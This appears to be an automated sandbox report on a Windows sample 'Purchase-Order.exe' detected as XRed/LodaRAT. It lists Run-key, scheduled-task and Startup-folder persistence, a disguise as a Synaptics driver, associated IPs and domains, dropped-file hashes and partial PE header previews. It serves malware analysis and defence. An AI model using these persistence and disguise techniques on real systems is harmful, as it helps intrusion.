                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:22
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Sample name:Purchase-Order.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.expl.evad.winEXE@22/158@23/4
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 99%
                                                                                  • Number of executed functions: 40
                                                                                  • Number of non-executed functions: 316
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 184.28.90.27, 52.182.143.214, 40.126.31.69, 172.202.163.200, 13.107.246.45
                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, onedscolprdcus19.centralus.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Report size getting too big, too many NtReadFile calls found.
                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                  TimeTypeDescription
                                                                                  05:35:53API Interceptor1107x Sleep call for process: Synaptics.exe modified
                                                                                  05:37:50API Interceptor13x Sleep call for process: splwow64.exe modified
                                                                                  10:35:48Task SchedulerRun new task: LMDNDG.exe path: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe
                                                                                  10:35:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LMDNDG "C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe"
                                                                                  10:35:58AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                  10:36:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LMDNDG "C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe"
                                                                                  10:36:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LMDNDG.lnk
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  172.111.138.100FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                    sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                      LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                        JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                          KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                            Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                              AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                  mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                    Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      69.42.215.252FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                      docx.msiGet hashmaliciousXRedBrowse
                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                      hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                      222.msiGet hashmaliciousXRedBrowse
                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                      LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                      JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                      KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                      Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                      AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                      222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      s-part-0017.t-0009.t-msedge.netFGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 13.107.246.45
                                                                                                      sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                      • 13.107.246.45
                                                                                                      docx.msiGet hashmaliciousXRedBrowse
                                                                                                      • 13.107.246.45
                                                                                                      hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                      • 13.107.246.45
                                                                                                      222.msiGet hashmaliciousXRedBrowse
                                                                                                      • 13.107.246.45
                                                                                                      KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 13.107.246.45
                                                                                                      Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                      • 13.107.246.45
                                                                                                      universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.45
                                                                                                      universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.45
                                                                                                      https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.45
                                                                                                      freedns.afraid.orgFGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      docx.msiGet hashmaliciousXRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      222.msiGet hashmaliciousXRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      VOXILITYGBFGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 172.111.138.100
                                                                                                      sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                      • 172.111.138.100
                                                                                                      LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 172.111.138.100
                                                                                                      JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 172.111.138.100
                                                                                                      KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 172.111.138.100
                                                                                                      Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                      • 172.111.138.100
                                                                                                      AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 172.111.138.100
                                                                                                      222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 172.111.138.100
                                                                                                      mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                      • 172.111.138.100
                                                                                                      Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 172.111.138.100
                                                                                                      AWKNET-LLCUSFGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      docx.msiGet hashmaliciousXRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      222.msiGet hashmaliciousXRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 69.42.215.252
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      37f463bf4616ecd445d4a1937da06e19FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 142.250.186.142
                                                                                                      • 142.250.186.97
                                                                                                      docx.msiGet hashmaliciousXRedBrowse
                                                                                                      • 142.250.186.142
                                                                                                      • 142.250.186.97
                                                                                                      hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                      • 142.250.186.142
                                                                                                      • 142.250.186.97
                                                                                                      222.msiGet hashmaliciousXRedBrowse
                                                                                                      • 142.250.186.142
                                                                                                      • 142.250.186.97
                                                                                                      LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 142.250.186.142
                                                                                                      • 142.250.186.97
                                                                                                      JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 142.250.186.142
                                                                                                      • 142.250.186.97
                                                                                                      KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 142.250.186.142
                                                                                                      • 142.250.186.97
                                                                                                      Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                      • 142.250.186.142
                                                                                                      • 142.250.186.97
                                                                                                      AYRASY.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 142.250.186.142
                                                                                                      • 142.250.186.97
                                                                                                      222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      • 142.250.186.142
                                                                                                      • 142.250.186.97
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      C:\ProgramData\Synaptics\RCX600B.tmphoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                        222.msiGet hashmaliciousXRedBrowse
                                                                                                          Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                            222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):118
                                                                                                              Entropy (8bit):3.5700810731231707
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                              MD5:573220372DA4ED487441611079B623CD
                                                                                                              SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                              SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                              SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                              Malicious:false
                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                                                                              Process:C:\Users\user\Desktop\Purchase-Order.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:modified
                                                                                                              Size (bytes):771584
                                                                                                              Entropy (8bit):6.638013190381294
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                              MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                              SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                              SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                              SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX600B.tmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX600B.tmp, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: hoaiuy.msi, Detection: malicious, Browse
                                                                                                              • Filename: 222.msi, Detection: malicious, Browse
                                                                                                              • Filename: Machine-PO.exe, Detection: malicious, Browse
                                                                                                              • Filename: 222.exe, Detection: malicious, Browse
                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\Purchase-Order.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2205184
                                                                                                              Entropy (8bit):7.057045739046609
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:hnsHyjtk2MYC5GDfkwkn9IMHealA0Rcj2sdS2CFAaPCSO:hnsmtk2aBdnV94212CRPCt
                                                                                                              MD5:63A057389438A0B287D32E31149D6AD4
                                                                                                              SHA1:F2114DEA9D348008317751D413BDF5D4FC047513
                                                                                                              SHA-256:1150FC6830ED3E383726E18B447D840F62F74B30D072291762A70D6C7600CB45
                                                                                                              SHA-512:A2CABA5E5E38C282E224A1B381BFA7CE140AB018B118C4FBD224D9444C4380A664131B35B21D05AAB5B041683A3095A33B442B288505A75D93989D4A1DDBD096
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\Purchase-Order.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                              Malicious:true
                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.270535329419833
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0oSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+b+pAZewRDK4mW
                                                                                                              MD5:E094B8CCC16BC722C14035E19E5AD5C3
                                                                                                              SHA1:DA0097CF342EF9997ACCC46B617E3AA9F04A0C09
                                                                                                              SHA-256:DEBED4DC1240C4B42AF91B83E4B37CFE8F75525A7AA62720EE3B6FAE16D08EE2
                                                                                                              SHA-512:69C71EFA1EA9CE8E3AEE14BAB66DCEA90BEF7AF20CAFD17FE9E5A2280EDF5185C154A5DDE9CC60EE2D95A3E52974B1EFC28F4605C985D539777E4D14B79DDBA8
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WjJEzg044rE3ZFQCf6e__Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.260045036862066
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0P32SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+MG+pAZewRDK4mW
                                                                                                              MD5:AB80D11A56D9779D60EE98F9EC33E544
                                                                                                              SHA1:C27D52FD5E3BAA378726AAF1EE2FA78A6116BE2B
                                                                                                              SHA-256:AE01CAA5E1FF53E8267B60C45FDB751578DC717CAB07348EF50FD8B094D19205
                                                                                                              SHA-512:1EB5B67E92E1E79E1E2A215D0B639EAC2BBB55E63EBBF5D3B7FA90954FAC45B9D1E03C20459B85131ADC748B92E3A4D522C1A6609F923953BD76E109B68B5F2E
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ltYKMhfqfa-YaLH__nzX0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.263086221338913
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0gXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                              MD5:C3AB65FA9C3880AEA78CB6BD14772FEE
                                                                                                              SHA1:0592CEBCB5ECAA5839033B985AC0AF281B0CD64A
                                                                                                              SHA-256:07D1E7F701524FE1565F3E2DDAE379C74A235FF33293A5F1C6F1509BCAFA9DB2
                                                                                                              SHA-512:C2D20DB6BE3BCFF5EF1D9A39B5A2B9EB7AB3025D185C690D2A42F7C01D4193DDF20C450CD3893610071D78625A06B4A0EA84CA228435DBDD7243046BAA7594A3
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eMBflWoWoQWzdqjzrJwsQA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.267582033898697
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0Yv/DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+zb+pAZewRDK4mW
                                                                                                              MD5:5BD029B6327772447D997172B46330DB
                                                                                                              SHA1:5D980E6D1D49507C9145401644DF0D05BC337614
                                                                                                              SHA-256:9C414274F247FD530F63A94A10C6DADE2C1BED920C9F73BD2807318E71B1AEA5
                                                                                                              SHA-512:F289D3B04F9835E50F5BC4A2572EDA0C79ECA47E752E35A5DD4D41B92AF2B2782C5816F1BC2BD0C93F92D74AB5A0E25275DF21DEF3E8CB5D3569B455B00E15DF
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SSQ1LiXV1TO2lmImJyeF4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.256943899528487
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0IzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+rz+pAZewRDK4mW
                                                                                                              MD5:1463061B7B3627A0970C16FAD071985C
                                                                                                              SHA1:154F3C7DAF4C6B736B532070E1FE09924292BE2A
                                                                                                              SHA-256:B9C51D2A3EE5345A48443B71DDA498F2BDF76FE42F727AFF9D9157D2988F576A
                                                                                                              SHA-512:D8BE76C8B885D23641F052B04355BDD22CA0CB0DBFF083FF90357B88F7EE570023590FB1D39EB4903E969DDF92CA984170C596F5294EF9C126978338E2C5658E
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tfPIHu8spbbeSs1uVRFPfw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.268069040507226
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0nSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I+pAZewRDK4mW
                                                                                                              MD5:5F1ED680D47943F627B2748C478392EF
                                                                                                              SHA1:EAF7363F3ECF75EAB25A5CA98D41C03C8E6E6BDC
                                                                                                              SHA-256:D802F6153A15760FF5E7EF086AA5B349FA17EA726FF85F629C7E7A474BEDADCE
                                                                                                              SHA-512:B2222B81BD697728AF70761205E7F0B66D679BB43B0F26EB11242374E192D7EA2C588A666F49698FAA1A61E19ECA11402A26F720BCBC1A893206DF561BF0AB68
                                                                                                              Malicious:false
